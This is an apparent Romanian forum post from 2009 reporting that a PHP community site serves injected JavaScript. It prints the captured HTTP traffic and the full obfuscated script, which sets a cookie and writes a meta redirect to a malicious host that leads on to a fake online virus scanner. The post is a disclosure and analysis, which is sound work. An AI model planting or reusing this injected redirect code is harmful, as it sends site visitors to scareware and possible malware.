Antete Trimise scrie:GET / HTTP/1.1
Accept: application/x-silverlight, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: phpromania.net
Connection: Keep-Alive
Cookie: __utma=217314775.209756747.1253141400.1253141400.1253141400.1; __utmb=217314775; __utmz=217314775.1253141400.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Antete Primite scrie:HTTP/1.0 200 OK
Date: Tue, 15 Sep 2009 18:17:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Content-Length: 731
Connection: Keep-Alive
Continut primit:
Cod: Selectaţi tot
<script type="text/javascript" language="javascript">var hqrwa=new Date();hqrwa.setTime(hqrwa.getTime()+014*074*074*01750);document.cookie="\x6e_s\x65\x73\x73_\x69d\x3d\x63\x643f\x63\x34\x63\x66e\x39700ee\x30de\x34b\x35\x65c\x39\x340\x30c38e\x38"+"\x3b\x20pat\x68\075\x2f; \x65xpir\x65s="+hqrwa.toGMTString();</script> <script type="text/javascript" language="javascript">var bgpo=new Array("\x68\x74\x74p\x3a\x2f\x2fus\x64\x69s\x74\x75\x72\x62ed.\x63\x6e\x2f\x3f\x70\x69\x64\x3d\x318\x30\x73\x30\x31&si\x64\x3d\x33\x635\x37\x379");var elitzp="ca,co,\x64\x61,de\x2ccy,el\x2cen,e\x6f,es\x2cfi\x2cfr,\x67a,\x69t\x2cja\x2cji\x2ck\x6e,n\x6c,\x6eo,\x70t,\x73v";var ypukog=navigator.language||navigator.systemLanguage;var lang=ypukog.toLowerCase();lang=lang.substr(0,2);if(elitzp.indexOf(lang)==-1){fcok();}else{var rpygwij=Math.floor(Math.random()*bgpo.length);pynidzq(bgpo[rpygwij]);}function pynidzq(ygmxwhh){document.writeln("\x3cME\x54\x41 H\x54TP-EQU\x49V=\047Re\x66res\x68\047\x20\x43ONT\x45N\x54=\0470;\x20UR\x4c="+ygmxwhh+"\047\x3e");document.writeln("\x3cmeta \x68\x74t\x70\055\x65quiv\x3d\047\x70r\x61gma\x27 c\x6fnt\x65nt\x3d\047no-\x63a\x63h\x65\047\076");document.writeln("\074meta na\x6d\145\x3d\047\x72ob\x6fts\047 con\x74en\x74=\047noi\x6ede\x78,n\x6ff\x6fll\x6fw\x27>");}function fcok(){return;}</script>
Din codul de mai sus o sa vedeti ca se seteaza un cookie care probabil ulterior ii ajuta pe ei sa verifice cine esti, si se scrie un meta de redirect catre HOST: usdisturbed.cn
Virus antete Trimise scrie:GET /?pid=180s01&sid=3c5779 HTTP/1.1
Accept: application/x-silverlight, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: usdisturbed.cn
Connection: Keep-Alive
Virus antete Primite scrie:HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Sep 2009 21:21:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: red=1; expires=Thu, 17-Sep-2009 21:21:24 GMT
Location: http://delete-all-virus05.com/scan1/?pi ... UxMMMOPAhN
Content-Type: text/html
Connection: close
Continut pagina virus partial:
Cod: Selectaţi tot
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>My computer On-line Scanner</title>
Eu zic sa verificati sursele, faceti un scan, investigati si sunt curios ce o sa gasiti. Daca nu reusiti nimic schimbati hostul.